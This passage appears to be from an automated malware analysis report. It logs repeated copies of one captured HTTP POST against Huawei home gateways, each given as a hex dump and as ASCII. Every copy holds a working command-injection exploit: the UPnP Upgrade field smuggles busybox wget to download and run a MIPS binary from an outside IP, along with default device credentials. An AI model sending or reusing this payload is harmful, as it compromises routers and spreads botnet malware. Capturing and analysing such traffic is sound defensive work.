77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 